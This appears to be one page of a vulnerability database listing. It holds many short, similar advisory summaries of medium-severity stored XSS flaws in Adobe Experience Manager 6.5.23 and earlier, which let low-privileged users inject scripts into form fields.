Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged attackers to inject malicious scripts into form fields that execute when victims view affected pages. The vulnerability requires user interaction and can result in session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. The vulnerability requires low-level privileges and user interaction to exploit, enabling attackers to steal session data or perform actions on behalf of victims. No patch is currently available for this medium-severity issue.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager versions 6.5.23 and earlier enables low-privileged attackers to embed malicious scripts in form fields that execute when legitimate users view the affected pages. An attacker with basic authentication can inject JavaScript that runs in victims' browsers, potentially compromising session data or performing unauthorized actions. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker with login credentials can compromise victim browsers and potentially steal sensitive information or perform unauthorized actions within the application context. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields, which execute in the browsers of users viewing those pages. The vulnerability requires user interaction and has limited scope of impact, affecting confidentiality and integrity but not availability. No patch is currently available for this medium-severity issue.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker with low privileges and user interaction can compromise the confidentiality and integrity of victim sessions. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. A low-privileged user can exploit this to perform actions in victim browsers or steal sensitive information, though no patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute in victims' browsers when the affected pages are viewed. The vulnerability requires user interaction and is limited to low-impact information disclosure and modification, though it can affect multiple users due to its stored nature. No patch is currently available for this issue.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers with low privileges to inject malicious scripts into form fields, which execute in victims' browsers when they access affected pages. The vulnerability requires user interaction and can result in session hijacking, credential theft, or malware distribution. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in victims' browsers, potentially leading to session hijacking or credential theft. The vulnerability requires user interaction and is currently unpatched, with no active exploitation reported.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute in users' browsers when the affected pages are accessed. An attacker with login credentials can craft payloads that persist in the application and compromise victim sessions or steal sensitive data. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows low-privileged authenticated users to inject malicious scripts into form fields that execute in other users' browsers when they access affected pages. An attacker can exploit this to steal session tokens, perform unauthorized actions, or deface content with minimal user interaction required. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields, which execute in victims' browsers when the affected pages are accessed. An attacker with login credentials can exploit this vulnerability to steal session tokens, credentials, or perform actions on behalf of users viewing the compromised forms. No patch is currently available for this vulnerability.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields that execute when other users view the affected pages. An attacker with low privileges can exploit this vulnerability to steal session tokens, credentials, or perform actions on behalf of victims through their browsers. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts through form fields, which execute in victims' browsers when they view affected pages. The vulnerability requires user interaction and network access but can impact confidentiality and integrity across security domains. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager 6.5.23 and earlier contains a stored XSS vulnerability in form fields that allows low-privileged authenticated users to inject malicious scripts affecting other users who view the compromised pages. When a victim browses to a page containing the injected payload, the malicious JavaScript executes in their browser context, potentially enabling session hijacking or credential theft. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier allows authenticated attackers to inject malicious scripts into form fields, which execute in victims' browsers when they view affected pages. This requires user interaction and an authenticated attacker, but could compromise the confidentiality and integrity of user sessions. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored XSS in Adobe Experience Manager 6.5.23 and earlier enables authenticated attackers to inject malicious scripts into form fields that execute when users view affected pages. An attacker with login credentials can compromise victim browsers and steal sensitive data or perform actions on their behalf. No patch is currently available.

Adobe XSS Experience Manager
NVD VulDB
Prev Page 34 of 432 Next

Quick Facts

Typical Severity
MEDIUM
Category
web
Total CVEs
38830

Related CWEs

MITRE ATT&CK

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy